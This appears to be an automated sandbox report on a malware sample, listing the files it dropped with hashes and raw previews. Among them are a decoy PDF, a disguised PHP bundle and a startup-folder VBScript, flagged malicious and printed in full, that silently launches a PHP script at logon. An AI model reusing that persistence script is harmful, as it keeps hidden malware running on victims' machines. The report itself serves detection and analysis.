                                              Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PHP-8.2.vbs

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):241
                                              Entropy (8bit):5.1988325826246875
                                              Encrypted:false
                                              SSDEEP:6:jtiGNOlyRVFeEPwknaZ538TR9MNwknaZ538TR9oqvKbEJvwWA:c9lYFeLrH3mRS+rH3mRdJvwWA
                                              MD5:0A51A1638534D38D0AED713EA385C770
                                              SHA1:734611E91663E32A14FED95531195965E5C90618
                                              SHA-256:D3F110DD9333F5F59656BA380BA73B884FC9F680D0A24C421B19031F3EA7021E
                                              SHA-512:2B9BA240D4F030925BABC4A5BB478ADDF2200D0215D099ADCC60C9162C8FBD432F300218D82DC62698C29BBB4A62FF27A867ACB7C1C2239AC9F52B6E8A156282
                                              Malicious:true
                                              Preview:Set oShell = CreateObject ("Wscript.Shell") ..Dim strArgs..strArgs = "cmd /c C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php-win.php"..oShell.Run strArgs, 0, false

                                              C:\Users\user\AppData\Roaming\Professional_Social_Media_Report.pdf

                                              Download File
                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:PDF document, version 1.5
                                              Category:dropped
                                              Size (bytes):13992
                                              Entropy (8bit):7.859157294568209
                                              Encrypted:false
                                              SSDEEP:192:uKKIwzdRBvoFiyCkub+95r5pE/kJkYMmC53MR/Ii1lAa7XqslQHVLSyIpX3de5wb:0PAojAFoD3MRVCa7XLlQhynSWqC
                                              MD5:A84ECD0D7CDE3DED019FF7D98E029BC8
                                              SHA1:CD581933B2D4195A954D4588669384FB777CAC2F
                                              SHA-256:39ED6A55B0F046C5C61429A5E2C52432C51A5909D9B2DC9D6ABA607BC0C15F30
                                              SHA-512:6DCB7A97803D1E6DC9899D58686579C76DB280D029C8D79C6C39B7BF095D823A6479AB07E3D415A695EFBBAB41BBA3FC73EFE0092631A3C19542DDDB5C330353
                                              Malicious:false
                                              Preview:%PDF-1.5.%.....2 0 obj.<<./Type /Catalog./Pages 4 0 R./OpenAction [5 0 R /FitH null]./PageLayout /OneColumn./AcroForm 6 0 R./Version /1#2E5.>>.endobj.8 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.9 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.10 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.11 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.12 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.13 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.14 0 obj.<<./Filter /FlateDecode./Length 10.>>.stream..x.+......|..endstream.endobj.15 0 obj.<<./Filter /FlateDecode./Length 761.>>.stream..x....r.0.....{...EgK.Mi..E......A.c......v0..3f@....].9..#.D..._\Y.DR.Wm....n...3..P..$....!B.a.(.J....$'.C.$x..n.0.v$..a.B..7.\5..o!..C<....p.%VB.%........{.^ O.o....W~.+.J.....+..8.|...a...D..`x..d.Bt..

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64.zip

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exe
                                              File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                              Category:dropped
                                              Size (bytes):31886616
                                              Entropy (8bit):7.996327176919507
                                              Encrypted:true
                                              SSDEEP:786432:4Dz+kmvQr7HvMeqWGbmv9+0/NyvLkuPO/oNGtbogIX+xzBYR6GuSZ:4DzvmYr7HsbaYOYKHzBYR6GP
                                              MD5:29C9E2CDE366197C69D233D35E7B37EC
                                              SHA1:3D2F575DBCE04912774D71D89397D993BF60AAFB
                                              SHA-256:F5651BFB5DE738EA1A0E361EB2057DFAB93E0BAC52B3BEC67DFA7A329E1887E7
                                              SHA-512:D7EE3C97E72209537519E04E3D2182385E0B3A8BA575F0D581CEE3C1F82ABAD79E74BF02929C9356A93E71473A06AE4E7776E3353272FAF29EFD7FD8FDCB16A9
                                              Malicious:false
                                              Preview:PK.........b$Z................php-8.2.11-Win32-vs16-x64/PK..........:W.Y.........'...php-8.2.11-Win32-vs16-x64/deplister.exe.\i|T....%..M$.....6..@.&N.y.....H@.E$.Y..J..$.I4..(m.b.-...@[..."[....%...F4.&.....o&..]~..../..].=..s.=..s.}..o.,. X..uAh..?.......|g..\..&...[..[.\.j.Uw....V...9W..p....7c.....,.6##...1.'.l..{/..m.~:...=]..[O..^..gO.........I<......}o6.....m.=...............E..n..!.9J.b...F..ax8.. ....!.'....H..A.P.)^..54~APx.#.P4..n....A....&...&a.g........L.R.._..Z....7...[..8...U...%..~`..~..-x.....Z.L.:.:......E.]...>.....G..[8.'.*!.........Z.|E.......x_t.\....!.JXq9...+.ou9........E.3...)......2..U&G2..&A.D.F...D..(..?.._rhOA.~.oH-.v.].5.0..&9.s.....$...........2..H&A..r..V.../5.......J{..2.5O....)..j...}o.@K..8...#.......H..A].&y....q.m...IT.[.G.f..uxg...({t..Kl.n..........C.s.6.rmT..~.....xi.V<.2.....hp&.k.l.S..i...T..B...m+/s.}.'.8f.._......I.W.....I.].0.....^.P~..y.<..$.|.....}.l.....r......oLT.X.y...{.....H.Q.q..,....1H.k.

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\README.md

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):5215
                                              Entropy (8bit):5.049213558480258
                                              Encrypted:false
                                              SSDEEP:96:LXTqtuZSdgMGEl6edRe4sq+WoWQdrdQR4ks1z4Maj1OQybvb5fEo8v/L4kYfIH:fZAV0hWoWQdJz9RCXn8AH
                                              MD5:EB21DB12F94395D282CEEA1B89FD96CE
                                              SHA1:2E9404B1E47D8FBFA93DC9D6E0AA13EEF9262EA6
                                              SHA-256:093947FE0C56958909B0254B90E5F35C17367E858E85E144518E5913612272E6
                                              SHA-512:11B35288D941BDD772D1E8E5A20819EACFDA2B59EA32FB18BEA3F10F4B61D1EE8E4E22F473FC095E379AF3517561530B3097B7D74DA477237F71AB52C0998737
                                              Malicious:false
                                              Preview:<div align="center">.. <a href="https://php.net">.. <img.. alt="PHP".. src="https://www.php.net/images/logos/new-php-logo.svg".. width="150">.. </a>..</div>....# The PHP Interpreter....PHP is a popular general-purpose scripting language that is especially suited to..web development. Fast, flexible and pragmatic, PHP powers everything from your..blog to the most popular websites in the world. PHP is distributed under the..[PHP License v3.01](LICENSE).....[![Push](https://github.com/php/php-src/actions/workflows/push.yml/badge.svg)](https://github.com/php/php-src/actions/workflows/push.yml)..[![Build status](https://travis-ci.com/php/php-src.svg?branch=master)](https://travis-ci.com/github/php/php-src)..[![Build Status](https://dev.azure.com/phpazuredevops/php/_apis/build/status/php.php-src?branchName=master)](https://dev.azure.com/phpazuredevops/php/_build/latest?definitionId=1&branchName=master)..[![Fuzzing Status](https://oss-fuzz-build-lo

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\config.json

                                              Download File
                                              Process:C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe
                                              File Type:JSON data
                                              Category:dropped
                                              Size (bytes):35
                                              Entropy (8bit):4.61499730265925
                                              Encrypted:false
                                              SSDEEP:3:YIygXZoC4:YIygpoC4
                                              MD5:27ACF002C7E9A08F6DA5131B48F55F92
                                              SHA1:E483701A0FF41FC179C3CE4CFB5F9B9F94F622CF
                                              SHA-256:3EF55B76B49F35577DFAF29D12A5271A121C5F1A30150CD7595A878DC9D6962E
                                              SHA-512:D08BAD43B4E7B73A83107F57CB603DBBBF5AA3388B75608B8B736EF68474D0569019F83F7CDC9C22545BCD904C6BC48A37969997F3D2D15028BE43973AD4A4F6
                                              Malicious:false
                                              Preview:{"mid":"PKJ2RMXRS481H4NV6VCC978Z3"}

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\deplister.exe

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):137728
                                              Entropy (8bit):6.169106814401788
                                              Encrypted:false
                                              SSDEEP:3072:TTAwfmrTEtePxy/OC5Q1F0rLG0j1iNuqsC:owfmr4tmyZQ1F86fsC
                                              MD5:658D4D78AB13D9205BB981D2B320FF3D
                                              SHA1:D9A236461F8A2832472E5002A45FA125FC7C307D
                                              SHA-256:861CEA918217D9D0A189DD4220DAE21409B5B05C4AB4D71B07401EEC90415979
                                              SHA-512:1478FF69BB67EE89151BBB0F7EC9E31ECE595A64FC8609A7643C536A66BC0B5461F3A53EE3738D1F6DB574DF6E9BD56256907E879110A69E20F19346FB7E5576
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K...........D......D.....D......]...(..]......]......D.........U..............Rich...................PE..d...1..e.........."......F.....................@.............................p............`.....................................................<............0...............`..t...................................0...8............`..h............................text....E.......F.................. ..`.rdata.......`.......J..............@..@.data...............................@....pdata.......0......................@..@_RDATA.......P......................@..@.reloc..t....`......................@..B........................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\dev\php8ts.lib

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:current ar archive
                                              Category:dropped
                                              Size (bytes):899110
                                              Entropy (8bit):5.278475644793723
                                              Encrypted:false
                                              SSDEEP:24576:CH2CK7ISYYUA2uv4h5AjxFYhDEvWKBKuj5hYFDhAxCHD8xFDJl+0zUv2CLO5aYnk:1Cph5AjxFYhDcj5hYFDhAxC0KYn8tOTA
                                              MD5:91AF7CF7F07C80ECDA554EF46A72AC68
                                              SHA1:2995D8CCC525DC34EDED260D042C37B3B53DB02E
                                              SHA-256:45BCB2D324F6B55D65D3BB911732EFF36462D0E56BA00199179A2A7C2C4DA64F
                                              SHA-512:BCAE717B53C8546411942E003D850675A37CFA93E954FC209FF091B145D422E2239AD9D1AEDACA23BCA78FF6A854CB0272BFFBEF4DF3F8412568847697383227
                                              Malicious:false
                                              Preview:!<arch>./ -1 0 222301 `................0.. v.. v......... ... ...........X...X...........z...z...........f...f...........D...D...........:...:........... ... ...................................z...z...........p...p...................V...V...H...H...................................................z...z...........V...V...........H...H...........8...8...........2...2...................................................h...h...........b...b...........Z...Z...........H...H...........2...2................... ... ...........................|...|...........j...j...........d...d...^...^...................T...T...........................F...F...z...z.............................................................................$...$...........,...,...........N...N...r...r..........|p..|p..|...|...}:..}:...........Z...Z...........................:...:...2...2........................... ... ...................................F...F...t...t...........@

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_bz2.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):86528
                                              Entropy (8bit):6.281181200934599
                                              Encrypted:false
                                              SSDEEP:1536:BH5X17IIL23le3qAvLJJAJ/LBdlgoHKepKyRG30TQVL2hCD+PANmxIzkZwr72HE8:BH5lh23lgxJJAJ/LBdeoHKepKyRG30Tf
                                              MD5:720E64E92AA6931056CDB0939FE56A32
                                              SHA1:A9AE4762401B26180DCA023C6265DB8428FDA87C
                                              SHA-256:653405756355F72F6747B72B0BCD98DB13E0C49EA0FDC42868D2B631EAB7D7A8
                                              SHA-512:86B823787AF84951A86316179C1FCE371BCE5F8480F1C62E7C5D9E25720C6701F15BF1BC1951459CF714EFDF42740EC309F1D30A9C418C667417BC25766B988E
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L.......................Z.......n.m.....Z.......Z.......Z.......C......>..................`.....................o.............Rich............PE..d...m..e.........." .........\......p...............................................v0....`A........................................`0.......0.......p.. ....`..........................T...........................p...8...............(............................text...8........................... ..`.rdata...-..........................@..@.data........@.......$..............@....pdata.......`.......<..............@..@.rsrc... ....p.......F..............@..@.reloc...............P..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_com_dotnet.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):93184
                                              Entropy (8bit):5.978941296348925
                                              Encrypted:false
                                              SSDEEP:1536:BsaJPBjIIXAxIVUMvbPQFfmp5EA6pECZcf46gTb4l6:BnPBjvXcIH2epGND1Zb4l6
                                              MD5:3E142577EB957815AF13BF1A5C93EBB7
                                              SHA1:F1E8D0724612AAFFD4DA3907A4E35899832C0F07
                                              SHA-256:B6186371BA44F02B40EB362D040F79C85C84B179234CB30EED0542810B7F5B03
                                              SHA-512:165D4D7613988C03C824132243F28964EB15B5D4387D30CF434DCDD0FC744016B3FF0C14F175CF73483468940AE14FA991BFAC8BF09F33968619CC3495483155
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Jj?.+.l.+.l.+.l.S.l.+.l.^.m.+.l.D.l.+.l.^.m.+.l.^.m.+.l.^.m.+.l.S.m.+.l.S.m.+.lo^.m.+.l.+.l@+.lo^.m.+.lo^.m.+.lo^.l.+.lo^.m.+.lRich.+.l........PE..d......e.........." ................P................................................<....`A.........................................>..D....A..........H....p.......................(..T....................*..(....)..8...............H............................text............................... ..`.rdata...i.......j..................@..@.data........`.......L..............@....pdata.......p.......P..............@..@.rsrc...H............^..............@..@.reloc...............h..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_curl.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):613376
                                              Entropy (8bit):6.396854012508999
                                              Encrypted:false
                                              SSDEEP:12288:HrzeAEkcbT1GzMSqr/b8QSylPgsUNsvu0znRwso:HrzVEkm1yEbbbSybUq2kwb
                                              MD5:34E47D3BBAD249717A2BB4AC725988A4
                                              SHA1:B588ABFE93ADA4E2E78F43FF39976013A3AA8F48
                                              SHA-256:E6A7EFDB029495FD9CA9AFA90662426BF5714EAABCBC24BD576EC75D042F70E8
                                              SHA-512:ABDB5E58B2C8E29BB6260DD9D5D1A5BA5D25104FE54871A6C85B557299EBFD669B99C2678F5860AB8190F880B1286F23DC2B7824E5ECF8DE4BD379A515B9A377
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......I.:...T...T...T.......T._.U...T.k....T._.Q...T._.P...T._.W...T...U...T...U...T.F.U...T...U...T...P.z.T...U...T...U.O.T...Y...T...T...T......T...V...T.Rich..T.................PE..d......e.........." .........|......................................................v,....`A.........................................................p..(.... ...F..................X...T...............................8...............`............................text............................... ..`.rdata..\...........................@..@.data...............................@....pdata...F... ...H..................@..@.rsrc...(....p.......J..............@..@.reloc...............T..............@..B................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dba.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):155136
                                              Entropy (8bit):6.327094904008958
                                              Encrypted:false
                                              SSDEEP:3072:HAiu7bIQdAua00c5Cb98xCvUd4xbVoQ/vV5rfnUV+8yJ:giu7V0T98UUd4bV7/vbn6+8A
                                              MD5:71BB1DF2571CF66FF93B96036E54F2FF
                                              SHA1:CBFA868C272386C89DDC98F5CE1B699737A47548
                                              SHA-256:AA9A1003E20B4E8896DBE08616C92C094DE2C616B44703094CE88CD4DD4FB8F2
                                              SHA-512:CDBC9DBC4922B946C57828BA1EDE70A7DB85575C15690160C958F9C0C2B1EE15B626F8F5099A3ADF3C08B611B4A4DBE610F8F59A2692A18A0D70DD0DA19FE887
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.C...-G..-G..-G.f.G..-GRk,F..-Gfq.G..-GRk(F..-GRk)F..-GRk.F..-GKf,F..-Gtu)F..-G.k,F..-G..,G..-G.k%F..-G.k-F..-G.k.G..-G.k/F..-GRich..-G................PE..d......e.........." ......................................................... ......|.....`A.........................................1..L...<2..........<.......p.......................T.......................(.......8............................................text...(........................... ..`.rdata..lh.......j..................@..@.data........P.......6..............@....pdata..p............:..............@..@.rsrc...<............R..............@..@.reloc...............\..............@..B........................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_dl_test.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):15872
                                              Entropy (8bit):4.9651171125725115
                                              Encrypted:false
                                              SSDEEP:192:g/X+vYbwIYHkgAIvphVn8XbfnMYu/AP3cnemwoot1mskcqron2ggkfu:Lv0wPaIREbqARKsYron2ggkfu
                                              MD5:A64A630D422F8CBCBC484D9C510CB104
                                              SHA1:746D5588B77FCD15ED47E077D8C40609773265EC
                                              SHA-256:02C4AC74A952934C1B71899C91DCCCDA02DC90F8E33A0191C405B9627737569E
                                              SHA-512:C094B9979A1F460FE69C9DDAB3ABD3F23A37A2BDE8466B424CA69A2FF79B6C22521D01CCCCA08B444F46F58D87353CFA9C64EEA8435C38248FB5A2D46B1DC096
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z7..>V..>V..>V..7.|.:V..l#..<V..l#..5V..l#..6V..l#..=V..u...<V...#..=V..>V...V...#..?V...#..?V...#..?V...#..?V..Rich>V..........PE..d......e.........." .........(......`.....................................................`A.........................................<..P...0=..x....p.......`..................t....5..T....................7..(...@6..8............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......,..............@....pdata.......`......................@..@.rsrc........p.......2..............@..@.reloc..t............<..............@..B................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_enchant.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):25600
                                              Entropy (8bit):5.3178190581624385
                                              Encrypted:false
                                              SSDEEP:384:vN51aByDw5E8rjyimL8/eu2kNUdxdB4KJnlTFZiqwisMgqkfu:IMDOlefLyR2vB4KJnlTFZRwbMgd
                                              MD5:A356D6C99F4F2E80E6448D56830B8FD9
                                              SHA1:E522D01BFCF42E268932D6D6DAEFB3A06F4D5CB6
                                              SHA-256:6B3D0381E29470C1532964CAC8FA3CC4C9FC754A421ADE421B716D2E65057D6B
                                              SHA-512:555C97E327368C55C2274AB0B4A477FE0FC539983AB2A453243292BC58567C22FC03E240FA7E507BFFC8C1DC31DF6D0355848AFAAACE2D4C670A036AE6C9599D
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........KX..*6..*6..*6..R...*6._7..*6._3..*6._2..*6._5..*6.R7..*6.)E7..*6."_7..*6..*7.*6."_>..*6."_6..*6."_...*6."_4..*6.Rich.*6.................PE..d...C..e.........." .....$...<......@)..............................................&.....`A........................................@\..P....\..x.......\.......................@...`R..T............................R..8............@..p............................text....#.......$.................. ..`.rdata...&...@...(...(..............@..@.data........p.......P..............@....pdata...............R..............@..@.rsrc...\............X..............@..@.reloc..@............b..............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_exif.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):72704
                                              Entropy (8bit):5.6441550329869195
                                              Encrypted:false
                                              SSDEEP:1536:nJtQBOQOSzVk4nb4zIJLOws2/ljU33bIWvuG4R0pj2:n98K4nb4z6LOws6jU33bIyuG4R0pj2
                                              MD5:FB963E03614162EFB085CDD68AD73F43
                                              SHA1:71F1C4B8D72AD8D7A7C9FB8C53E50DAAF5C2BBB8
                                              SHA-256:C6B007F6D7D0E8DAD4CD5A4422A08F336E39885BF96B8102516375FB2FAAC578
                                              SHA-512:EBE54AC71A03ACD95DA8FA8E41AC7CB29425E649FF972C0349329A409E0EE5469AB0EE70EBF018980F83EA34F9B6F8F55A0E5D231DE032B0A18FE9CA69AB58A4
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W\.9..9..9......9...8..9...<..9...=..9...:..9...8..9...8..9..8...9...4..9...9..9......9...;..9.Rich.9.................PE..d......e.........." .....n..........P........................................P...........`A............................................L............0..H.... ...............@.........T.......................(...0...8...............H............................text....m.......n.................. ..`.rdata..*............r..............@..@.data...............................@....pdata....... ......................@..@.rsrc...H....0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ffi.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):170496
                                              Entropy (8bit):6.265041804272224
                                              Encrypted:false
                                              SSDEEP:3072:FUJK2cGLGYk15EGkiVGwwC0IUZXvs5x4JQ+DCViNiioc37:+vLGN1CGCC0Inx4JQ+fNiOL
                                              MD5:CB8CC665579AF513C6FF6D4CA9C363FC
                                              SHA1:647E0D28E8DA6A016C34E18399C7A09DA22D1B7D
                                              SHA-256:B76671C131390FB7BDCB3DC62A87B01376C07FB6DF7E70508555725D5ADBC5A3
                                              SHA-512:2D79B4BAC5F981F6D4B2FD6B83FC0E407A939B2EEA7296A9D67F1A31F4020D5FA75A51812F47D3B43B4E70D4D80D366B6F3F9FF02886A7ABDF3E08D4455B7C67
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G,..&B.&B.&B.^..&B..SC.&B..I..&B..SG.&B..SF.&B..SA.&B..^C.&B..SA.&B.iSC.&B.&C.#&B.iSJ.&B.iSB.&B.iS..&B.iS@.&B.Rich.&B.........PE..d...o..e.........." .................................................................I....`A.........................................t..L....t..................d....................Y..T....................[..(....Y..8............................................text...X........................... ..`.rdata...t.......v..................@..@.data................t..............@....pdata..d............v..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_fileinfo.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):7118336
                                              Entropy (8bit):0.8788171480758775
                                              Encrypted:false
                                              SSDEEP:24576:hpsEq2bPlfDlx1W7vnPLaMK8+cMaWKO+TWthXu6tqasKvd7dgI9r0z3U/giEvtCY:hd3FV
                                              MD5:4848B983849BC0DD3BF4D32545EECBAB
                                              SHA1:03FEDFE8EAFC4E30C1693B4353E6A017CCE53870
                                              SHA-256:44A88E8024EE8E31CFF2A2A997016B9C35FC1784592B31DEA59D4A59385B5A1B
                                              SHA-512:DF06771C499E926935F6ADA311384E5790353BE3EC24B358EF17667B6A54C470B70D38086ADB2CA80A2BB78245602FD2496C1D91A0F5523D43CD561D1F664A77
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........u~....I...I...I.l.I...I.a.H...I.{.I...I.a.H...I.a.H...I.a.H...I.l.H...Ina.H...I...I...Ina.H...Ina.H...Ina.I...Ina.H...IRich...I................PE..d......e.........." ..........k...............................................l.......m...`A........................................0.l.l.....l.......l.......l...............l......6..T............................6..8............0...............................text............................... ..`.rdata...jk..0...lk.................@..@.data.........l.......l.............@....pdata........l.......l.............@..@.rsrc.........l.......l.............@..@.reloc........l.......l.............@..B................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_ftp.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):60928
                                              Entropy (8bit):5.5640487630494135
                                              Encrypted:false
                                              SSDEEP:768:j/G13ZFLJMNuubcWTC0RhHD0w1pF+jZ5HZp1HxnjgR8w2:j/83ZFLRugW+0R57FE5HH8R8w2
                                              MD5:A2B9F41806A728C6FA0CA1DF448F245D
                                              SHA1:3305AC0FDBA98D4283AF0576797E436C6E58094A
                                              SHA-256:9118A1C5486A4AB5E1F2284C7CCEABC83FD0D28F22FBB41D4F708ABF93FDA97E
                                              SHA-512:743EF137D6C5185EF4D208676EF82A657356758FB38ADBA9AC63CA3A25C1BAD87617204D324929AC2966693B2241642634D5D33A740CA106A7830622491FBB11
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................B........................................7.......<...........{...<.......<.......<.......<.......Rich............PE..d......e.........." .........j......P........................................ ......S3....`A............................................L...............8.......0...............@.......T...............................8............................................text....~.......................... ..`.rdata...K.......L..................@..@.data...............................@....pdata..0...........................@..@.rsrc...8...........................@..@.reloc..@...........................@..B........................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gd.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):9654784
                                              Entropy (8bit):6.8971412243538905
                                              Encrypted:false
                                              SSDEEP:196608:U9MNYoVwC1/pWJ1ad3djROzbDkId9hb1O0krXR3h75ZwBCHRtK11mUvF8Zq7wBpn:YM/wC1/pWJ1ad3djROzbDkId9hb1O0kT
                                              MD5:0BA7E3C3C7731C09F1412201422E7BDF
                                              SHA1:A8B7901157D3BB1CE17C7C632B1ACDC63A8182CA
                                              SHA-256:A7A806F5019EACBEBE5947DD661C6B841C4D4498A6D4968D0C3028B69B8306A8
                                              SHA-512:D2E615AB2C876AD96519C9A1E2340BF2A8BCF5473BDDCB19DCF6A590A9ED8F6C711E99DB6785E06A06587B9E0CC5F24447E7FA45DF4950F9322541580FFCBA85
                                              Malicious:false
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$.........-...C...C...C.......C...B...C.......C...F...C...G...C...@...C...B...C...G...C.?.G..C...G...C...C...C.~.G...C.l.B...C...B...C.l.N..C.l.C...C.l....C.l.A...C.Rich..C.................PE..d......e.........." ......U..n=......~R......................................p...........`A........................................P]..t....]..@.... .........t)...........0...=..$...T...............................8.............V.0............................text.....U.......U................. ..`.rodata.P.....U.......U............. ..`.rdata...y:...V..z:...U.............@..@.data....n...........^..............@....pdata..t)......*..................@..@.rsrc........ ......................@..@.reloc...=...0...>..................@..B................................................................................................................................................

                                              C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\ext\php_gettext.dll

                                              Download File
                                              Process:C:\Windows\System32\tar.exe
                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                              Category:dropped
                                              Size (bytes):54784
                                              Entropy (8bit):5.909416363407647
                                              Encrypted:false
                                              SSDEEP:768:gnqI2EDaTKJnzlGRKTjgmQP8uvNIUniVbHm7aboI0AO7imkoa6g1:gnqzEDaTMnXfdQPHNIyidrb5wah1
